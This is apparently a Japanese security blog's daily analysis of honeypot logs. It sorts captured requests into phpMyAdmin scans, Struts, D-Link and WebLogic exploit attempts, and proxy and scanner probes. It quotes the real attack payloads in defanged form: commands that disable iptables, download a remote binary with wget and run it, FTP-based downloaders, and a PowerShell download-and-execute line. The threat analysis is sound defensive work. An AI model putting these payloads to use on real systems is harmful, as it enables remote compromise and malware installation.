S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(13日目)

WOWhoneypotの2018/6/15(土)(運用13日目)の簡易分析です。

本日の総アクセス数は435件です。また平時の2倍近いアクセス数がありました。
これだけ多いと分析が大変ですが、ちょっとワクワクしますね。

awk '/06-16/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
78 [2018-06-16 "GET /
39 [2018-06-16 "HEAD /
21 [2018-06-16 "GET /index.action
8 [2018-06-16 "GET /mysql-admin/index.php
8 [2018-06-16 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
7 [2018-06-16 "GET /tools/phpMyAdmin/index.php
7 [2018-06-16 "GET /pmd/index.php
7 [2018-06-16 "GET /pma-old/index.php
7 [2018-06-16 "GET /pmamy/index.php
7 [2018-06-16 "GET /pmamy2/index.php
7 [2018-06-16 "GET /pma/index.php
7 [2018-06-16 "GET /phpmyadmin/index.php
7 [2018-06-16 "GET /mysql/index.php
7 [2018-06-16 "GET /index.php
7 [2018-06-16 "GET /db/index.php
7 [2018-06-16 "GET /dbadmin/index.php
7 [2018-06-16 "GET /claroline/phpMyAdmin/index.php
7 [2018-06-16 "GET /admin/mysql/index.php
7 [2018-06-16 "GET /admin/mysql2/index.php
6 [2018-06-16 "GET /xampp/phpmyadmin/index.php
6 [2018-06-16 "GET /www/phpMyAdmin/index.php
6 [2018-06-16 "GET /typo3/phpmyadmin/index.php
6 [2018-06-16 "GET /PMA/index.php
6 [2018-06-16 "GET /PMA2/index.php
6 [2018-06-16 "GET /phpMyAdmin/phpMyAdmin/index.php
6 [2018-06-16 "GET /phpmyadmin/phpmyadmin/index.php
6 [2018-06-16 "GET /phpMyAdminold/index.php
6 [2018-06-16 "GET /phpMyAdmin.old/index.php
6 [2018-06-16 "GET /phpmyadmin-old/index.php
6 [2018-06-16 "GET /phpMyAdmin/index.php
6 [2018-06-16 "GET /phpMyadmin_bak/index.php
6 [2018-06-16 "GET /phpmyadmin2/index.php
6 [2018-06-16 "GET /phpmyadmin1/index.php
6 [2018-06-16 "GET /phpma/index.php
6 [2018-06-16 "GET /phpadmin/index.php
6 [2018-06-16 "GET /mysqladmin/index.php
6 [2018-06-16 "GET /myadmin/index.php
6 [2018-06-16 "GET /myadmin2/index.php
6 [2018-06-16 "GET /admin/PMA/index.php
6 [2018-06-16 "GET /admin/pma/index.php
6 [2018-06-16 "GET /admin/phpMyAdmin/index.php
6 [2018-06-16 "GET /admin/phpmyadmin/index.php
6 [2018-06-16 "GET /admin/phpmyadmin2/index.php
6 [2018-06-16 "GET /admin/index.php
5 [2018-06-16 "GET /phpmyadmin0/index.php
4 [2018-06-16 "PROPFIND /
4 [2018-06-16 "GET /web/phpMyAdmin/index.php
1 [2018-06-16 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-16 "GET /xxbb
1 [2018-06-16 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-16 "GET /pma/scripts/setup.php
1 [2018-06-16 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-16 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-16 "GET /MyAdmin/scripts/setup.php
1 [2018-06-16 "GET /myadmin/scripts/setup.php
1 [2018-06-16 "GET /main.jsp
1 [2018-06-16 "GET /main.do
1 [2018-06-16 "GET /login.do
1 [2018-06-16 "GET /login.action
1 [2018-06-16 "GET /index.jsp
1 [2018-06-16 "GET /index.html
1 [2018-06-16 "GET /index.htm
1 [2018-06-16 "GET /index.do
1 [2018-06-16 "GET hxxp://httpheader[.]net/
1 [2018-06-16 "GET /home.jsp
1 [2018-06-16 "GET /home.do
1 [2018-06-16 "GET /ccvv

例によって、phpMyAdmin関係と思われるindex.php、setup.php等や調査と思われる/(ルート)へのアクセス等を除外します。

21 [2018-06-16 "GET /index.action
8 [2018-06-16 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-16 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-16 "GET /login.action
1 [2018-06-16 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-16 "GET /index.html
1 [2018-06-16 "GET /index.htm
1 [2018-06-16 "GET /home.do
1 [2018-06-16 "GET /index.do
1 [2018-06-16 "GET /login.do
1 [2018-06-16 "GET /main.do
1 [2018-06-16 "GET /home.jsp
1 [2018-06-16 "GET /index.jsp
1 [2018-06-16 "GET /main.jsp
1 [2018-06-16 "GET hxxp://httpheader[.]net/
1 [2018-06-16 "GET /xxbb
1 [2018-06-16 "GET /ccvv

 見るべきものが多いですが、種類分けして見ていきます。

 1. phpMyAdmin関係

普段ならスルーしていますが、アクセス件数が多いので、軽く見てみます。
まず、index.phpにアクセスしてくるログのサンプルです。

GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Keep-Alive
Cache-Control: no-cache

今回は複数回スキャンされているようで、普段は1-2IPから来ているのが、今回は4IPからスキャンされています。

$ awk '{print $1,$3,$5,$6}' access_log | grep index.php | awk '{print $1,$2}' | sort | uniq -c | sort -nr
84 [2018-06-16 103.82.52.171
81 [2018-06-16 114.116.3.232
51 [2018-06-16 103.233.255.107
49 [2018-06-16 202.53.137.242
84 [2018-06-15 120.24.236.8
34 [2018-06-14 195.216.239.82
62 [2018-06-13 139.199.5.150
49 [2018-06-12 59.63.206.214
20 [2018-06-12 139.196.186.208
82 [2018-06-11 47.90.102.190

setup.phpにアクセスしているは以下になり、ログの出方が違います。IPも別です。

GET /phpMyAdmin/scripts/setup.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: ZmEu
Connection: Close 

 こちらはUser-Agentに出ている通り、ZmEuというスキャンツールを使っています。
このツールを使う時は、以下のアクセスが一番始めに来ます。ZmEuがHelloって言ってるようなものだと思ってます。

GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: ZmEu
Connection: Close

2. Struts関係

いつもアクセスがありますが、本日は特に多い為種類を調べてみます。
ペイロード部分から攻撃っぽい部分を調査すると、以下の6種類のようです。

GET /index.action HTTP/1.1
Content-Type: ......(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://wap.tfddos[.]net:57843/linux;chmod 777 linux;./linux;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://119.188.247[.]73:5858/88888syzz;chmod 777 88888syzz;./88888syzz;').......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='echo Open 127.0.0.1 21>C:\Ftp.bat&&echo 123>>C:\Ftp.bat&&echo 123>>C:\Ftp.bat&&echo Binary>>C:\Ftp.bat&&echo Get 1.exe C:\setup.exe>>C:\Ftp.bat&&echo Bye>>C:\Ftp.bat&&echo Ftp.exe -s:C:\Ftp.bat>C:\Ftp.bat&&echo C:\setup.exe>>C:\Ftp.bat&&echo del C:\Ftp.bat>>C:\Ftp.bat&&echo del C:\Ftp.bat>>C:\Ftp.bat&&C:\Ftp.bat')......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='echo open 107.179.45.135> c:\cmd.txt&echo 110>> c:\cmd.txt&echo 110>> c:\cmd.txt&echo get 1.exe>> c:\cmd.txt&echo bye >> c:\cmd.txt&echo 1.exe>> c:\cmd.txt&ftp -s:c:\cmd.txt&start 1.exe&1.exe&del c:\cmd.txt&exit')......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='nMaskCustomMuttMoloz')......
GET /login.action HTTP/1.1
Content-Type: ......(#cmd='nMaskCustomMuttMoloz')......

最後の2つは調査行為と思われます。それ以外のアクセスは全て同じIPから攻撃が来ています。

1つ目の取得する不審ファイルは以下のものです。

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'http://wap.tfddos.net:57843/linux'

なお、最後の2つと同じペイロードのアクセスが以下のパスに対して来ていました。

1 [2018-06-16 "GET /index.html
1 [2018-06-16 "GET /index.htm
1 [2018-06-16 "GET /home.do
1 [2018-06-16 "GET /index.do
1 [2018-06-16 "GET /login.do
1 [2018-06-16 "GET /main.do
1 [2018-06-16 "GET /home.jsp
1 [2018-06-16 "GET /index.jsp
1 [2018-06-16 "GET /main.jsp

3.D-Linkの脆弱性を突くMirai亜種

昨日と同様ですが、アクセス数が多くなっています。

8 [2018-06-16 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'r'

4.Weblogic脆弱性を突くアクセス

これまでと同様のものと思われます。

1 [2018-06-16 "POST /wls-wsat/CoordinatorPortType
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');base64: invalid input

5. プロキシを探すアクセス行為

これまでも何度かあったものと同様と思われます。

GET hxxp://httpheader[.]net/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
Host: httpheader[.]net
Accept-Encoding: deflate, gzip
Proxy-Connection: Keep-Alive
Accept-Language: en-gb,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Pragma: no-cache
Cache-Control: no-cache

6.脆弱性スキャナーZGrabによるアクセス

アクセスしているパスはどういったものを対象としているかは不明です。

GET /xxbb HTTP/1.1
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip

7.調査行為(詳細不明)

アクセス対象の詳細は不明ですがペイロードに何もないため、パスが存在するかの調査行為と思われます。

GET /ccvv HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64)
Accept-Encoding: gzip

 

本日のハンティングログは以下です。

$ awk '/06-16/{print $1,substr($0,index($0,$4))}' /var/log/wowhoneypot/hunting.log | sort | uniq -c | sort -nr
8 [2018-06-16 wget hxxp://185.62.190[.]191/r
5 [2018-06-16 wget -c hxxp://wap.tfddos[.]net:57843/linux
5 [2018-06-16 wget -c hxxp://119.188.247[.]73:5858/88888syzz

D-Linkの脆弱性をもらったMirai亜種とStruts脆弱性を狙ったものです。

以上です。